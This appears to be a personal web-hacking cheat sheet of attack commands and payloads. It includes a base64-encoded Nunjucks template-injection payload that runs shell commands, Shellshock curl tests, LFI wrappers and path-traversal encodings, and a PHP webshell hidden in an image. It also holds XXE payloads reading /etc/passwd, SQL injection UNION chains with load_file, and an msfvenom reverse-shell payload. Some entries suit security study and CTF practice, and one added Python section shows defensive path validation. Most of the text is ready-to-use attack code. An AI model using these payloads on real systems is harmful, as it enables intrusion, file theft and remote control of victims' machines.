
Web

April 4, 2021 - Hacking

General


Automation

  • nikto -h <website> web server scanner (dangerous files, outdated server versions, misconfigurations)
  • wapiti -u <website> black-box web application scanner (crawls the site and injects payloads)


Network

Man in the Middle Attack

  • Ettercap Network Sniffing Tool
    • ettercap -G --> add IP as target --> Mitm menu
  • Wireshark
    • http.request.uri contains "login" display filter for HTTP requests whose path contains login (cleartext HTTP only; TLS traffic needs the session keys)

Webserver

  • host files with python3 -m http.server (serves the current directory on port 8000)
  • make it accessible on the internet with ngrok http 8000

Portscan

  • nmap <ip>
    • -sV service version detection
    • -O operating system detection
    • -v verbose, shows more about what it is doing
    • -p 21,80-90 test specific ports (-p- scans all 65535 ports)
    • nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN <outfile> <ip> just does kind of everything: no host discovery (-Pn), OS detection, version detection, default scripts and traceroute (-A), all ports, normal output saved to <outfile>
    • --script=<script name> run an NSE script

SSL/TLS

  • sslscan <website> enumerates supported protocols and cipher suites and flags known issues such as Heartbleed
  • sslyze --regular <website> gives complementary information
  • openssl s_client -connect <website>:443 shows the certificate chain and the negotiated SSL/TLS parameters


Source code

  • look for hidden fields, client-side input validation and encoding or encryption functions, e.g. a MAX_FILE_SIZE hidden field or a JavaScript file-format check; they show what the server expects and often what it fails to verify itself
  • OS Command Injection (user input reaches shell_exec or a similar call)
    • shell_exec with curl: curl file://localhost/../../flag (curl follows file:// URLs, so a URL parameter handed to curl reads local files)
    • shell_exec with a host parameter: 127.0.0.1;uname -a (a command separator appended to the expected IP)
  • nunjucks (server-side template injection)
    test@test.com {{range.constructor("return eval(Buffer('Z2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5yZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ2NkIC8gJiYgLi9yZWFkZmxhZycpLnRvU3RyaW5nKCk=','base64').toString())")()}}
    range is a Nunjucks global, so range.constructor is Function; the base64 decodes to global.process.mainModule.require('child_process').execSync('cd / && ./readflag').toString(), which is compiled and run on the server
  • Shellshock (CVE-2014-6271): Bash versions before the September 2014 patches execute commands appended to a function definition stored in an environment variable
    • Remote test: curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://<ip>/cgi-bin/test.sh (the User-Agent header becomes an environment variable of the CGI script)
    • Local test: x='() { :;}; echo VULNERABLE' bash -c : (prints VULNERABLE on an unpatched bash)


Files and Directories

Directory Fuzzer

  • <website>/robots.txt tells search engines which paths not to index, which makes it a list of paths worth looking at
  • OWASP ZAP: Tools | Options | Forced Browse --> Attack | Forced Browse directory
  • Burp Suite: Proxy | Intercept --> Target | Site map --> Spider | Control

Local File Inclusion

  • Allows you to include files that exist on the target machine
  • PHP wrappers
    • ?page=expect://ls execution of system commands via the PHP expect wrapper (only if the expect extension is loaded)
    • ?page=php://input the payload is sent in the body of a POST request, e.g. with curl
    • ?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd returns the file base64 encoded instead of executing it, which also works for reading PHP source
  • POODLE vulnerability (SSL 3.0 fallback; a TLS check that belongs with the SSL/TLS section above)
    • nmap --script ssl-poodle -sV -p 443 <ip>
  • Encoding (which variant works depends on how the server decodes the path before it checks it)
    • %2e%2e%2f is ../
    • %2e%2e/ is ../
    • ..%2f is ../
    • %2e%2e%5c is ..\
    • %2e%2e\ is ..\
    • ..%5c is ..\
    • %252e%252e%255c is ..\ (double URL encoding, for stacks that decode twice)
    • ..%255c is ..\
    • ..%c0%af is ../ (overlong UTF-8, accepted only by lenient decoders)
    • ..%c1%9c is ..\
  • Null bytes to terminate a filename (PHP before 5.3.4)
    • ?page=index.html%00.pdf the application's string check sees a .pdf, while the C-level file open stops at the null byte and opens index.html
  • Absolute path traversal
    • example http://website.com/get.php?get=/var/www/html/site.php
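The encoding variants above only work because of how the server decodes the path before checking it. The following Python is an added example (not code from the original page): lenient_decode mimics a permissive stack that percent-decodes repeatedly and accepts overlong UTF-8, so each listed variant collapses to ../ or ..\; null_byte_views shows the two views of index.html%00.pdf; safe_resolve is the hardened check that decodes exactly once, rejects NUL and overlong bytes and confines the result under a base directory. The function names and the /var/www/html web root are assumptions for illustration.

```python
import posixpath
from typing import Optional, Tuple
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 encodings of '/' and '\' that permissive decoders once accepted
# (the ..%c0%af and ..%c1%9c variants); a strict UTF-8 decoder rejects them.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}


def lenient_decode(path: str, max_rounds: int = 3) -> str:
    """Decode the way a permissive stack might: percent-decode until the value
    stops changing (so %252e becomes %2e and then '.'), then map overlong UTF-8
    sequences to the ASCII byte they encode."""
    raw = path.encode("utf-8")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    for overlong, ascii_byte in OVERLONG.items():
        raw = raw.replace(overlong, ascii_byte)
    return raw.decode("latin-1")  # latin-1 keeps any leftover byte as-is


def is_traversal(path: str) -> bool:
    """True when, after lenient decoding, a segment between '/' or '\\' is '..'."""
    segments = lenient_decode(path).replace("\\", "/").split("/")
    return ".." in segments


def null_byte_views(filename: str) -> Tuple[str, str]:
    """A string-based extension check sees the whole name; a C-string open()
    stops at the first NUL. Returns (what the check sees, what the OS opens)."""
    decoded = lenient_decode(filename)
    return decoded, decoded.split("\x00", 1)[0]


def safe_resolve(base: str, user_path: str) -> Optional[str]:
    """Hardened counterpart (assumed design, not the page's): decode exactly once
    and strictly, refuse NUL bytes, backslashes and absolute paths, normalise
    lexically and require the result to stay below base. None means reject."""
    try:
        decoded = unquote_to_bytes(user_path).decode("utf-8")  # overlong UTF-8 raises
    except UnicodeDecodeError:
        return None
    if "\x00" in decoded or "\\" in decoded or decoded.startswith("/"):
        return None
    base = posixpath.normpath(base)
    target = posixpath.normpath(posixpath.join(base, decoded))
    if not target.startswith(base + "/"):
        return None
    return target


if __name__ == "__main__":
    for variant in ["%2e%2e%2f", "..%2f", "%252e%252e%255c", "..%c0%af", "..%c1%9c"]:
        print(f"{variant:18} -> {lenient_decode(variant)!r}  traversal={is_traversal(variant)}")
    print(null_byte_views("index.html%00.pdf"))
    web_root = "/var/www/html"  # assumed web root
    for p in ["pages/about.html", "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
              "..%c0%afetc/passwd", "index.html%00.pdf", "%252e%252e%2fetc"]:
        print(f"{p:34} -> {safe_resolve(web_root, p)}")
```

Note that safe_resolve keeps a double-encoded %252e%252e as the literal directory name %2e%2e under the web root: decoding once is what makes the double-encoding trick harmless, while a second decode pass would turn it into a traversal.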

Remote File Inclusion

  • Rename to shell.php.jpg: the extension filter sees .jpg, but a server that maps every .php extension in the name to the PHP handler (Apache AddHandler with mod_mime) still executes it as PHP
  • Polyglot image: starts with the GIF header, so magic-byte checks pass, and carries PHP
    GIF89a;
    <?php
    system($_GET['cmd']); // or insert your complete shell code here
    ?>
  • exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' lo.jpg puts the payload into a JPEG comment segment, so the image stays valid
  • Magic bytes (patch them in with hexedit, e.g. hexedit tacos.txt.jpg)
    • JPEG FF D8 FF (FF D8 FF E0 for JFIF; FF D8 FF DB is also common)
    • PNG 89 50 4E 47
    • ZIP 50 4B 03 04
    • PDF 25 50 44 46
  • XML External Entity (XXE)
    • Remote code execution (needs the PHP expect wrapper on the parsing host)
      <?xml version="1.0" encoding="ISO-8859-1"?>
      <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "expect://id" >]>
      <creds>
      <user>&xxe;</user>
      <pass>mypass</pass>
      </creds>
    • Disclosing targeted files
      <?xml version="1.0" encoding="ISO-8859-1"?>
      <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
      <foo>&xxe;</foo>


Password

  • Profiling: build a word list from the words used on the target site with cewl -w <wordlist> -c -m 5 <website> (-c shows word counts, -m 5 skips words shorter than 5 characters)
  • Generate a dictionary: john --stdout --wordlist=<cewlwordlist>
    • Generate with mangling rules: john --stdout --wordlist=<cewlwordlist> --rules > <output.txt>

Cookies

  • Browser developer tools: Storage --> Cookies
  • get the session cookie from a website
    import requests
    s = requests.Session()                   # a Session keeps cookies across requests
    page = s.get(URI).text                   # URI: the page whose response sets the cookie
    session_cookies = s.cookies.get_dict()   # the cookies the server set, e.g. the session id
  • send a session cookie to a website
    import requests
    cookies = {'enwiki_session': '17ab96bd8ffbe8ca58a78657a918558'}
    r = requests.post('http://wikipedia.org', cookies=cookies)


IDS/IPS

  • Detection:
    • wafw00f <website> fingerprints the web application firewall in front of the site
    • nmap --script=http-waf-detect or --script=http-waf-fingerprint identify a web application firewall


XSS


SQL Injection

  • Typical login query: SELECT select_list FROM table_name WHERE username = '' AND password = '' (the user input is pasted between the quotes)
  • Try adding a debugging parameter such as ?debug=1
  • sqlmap sqlmap -u "http://<website>?parameter=<value>"
    • --dbs list the databases
    • --tables -D mydb list the tables of database mydb
    • --passwords dump the password hashes, optionally followed by a dictionary attack
    • --dump dump the database tables
    • -b print the DBMS banner
    • -h print the help
    • -hh list all parameters and their options

Output based Injection

  • Test
    • 1 produces a valid response
    • 1' --> different output or an error, and 1'' --> normal response
    • <true parameter> and 1=2# --> different output or an error, and <true parameter> and 1=1# --> normal response (# is the comment character in MySQL)
    • <true parameter> and 1=2-- --> different output or an error, and <true parameter> and 1=1-- --> normal response (-- is the standard SQL comment; MySQL needs a space after it)
  • Exploit
    • find a name: <true parameter> and name like 'a%' if a% matches you can continue with aa%, ab%, ...
    • find the number of columns: <true parameter> order by 2-- if 2 is valid you have at least 2 columns; increase until the query errors
    • find which columns are displayed: <true parameter> union select 1,2,3,4<etc., as many columns as found> from <tablename># or without a table name <true parameter> union select 1,2,3,4<etc.>#; the numbers that appear in the page mark the columns you can use for output
    • database version <true parameter> union select 1,2,version(),4 from <tablename>#
    • database name <true parameter> union select 1,2,database(),4 from <tablename>#
    • current user <true parameter> union select 1,2,current_user(),4 from <tablename>#
    • table names of the current database <true parameter> union select 1,2,table_name,4 from information_schema.tables where table_schema=database()#
  • read the /etc/passwd file (MySQL, needs the FILE privilege; 0x2f6574632f706173737764 is /etc/passwd in hex, which avoids quotes, and "1 and 1=2" drops the original row so only the union row is shown)
    id=1%20and%201=2%20union%20select%20load_file(0x2f6574632f706173737764),2,3,4,5,6,7,8%20from%20mysql.user--

Error based Injection

  • Test
    • index.php?usr[] Warning: preg_match() expects parameter 2 to be string, array given (passing an array where the code expects a string forces an error)
  • Exploit
    • look for useful information in the error, such as file names, paths or the methods used.

True Injection

  • 1' or 1=1 # makes the WHERE clause always true, e.g. as a username to log in without a valid password

Blind Injection

  • 1' --> no output, and 1'' --> output
  • 1' and '1'='2 --> always false, no result; 1' and '1'='1 --> always true, result if id 1 exists (the query's own closing quote completes the last string, so no comment is needed)


Metasploit

  • msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > payload.exe builds a Windows executable that connects back to <ip>:<port>; catch it with exploit/multi/handler configured with the same payload, LHOST and LPORT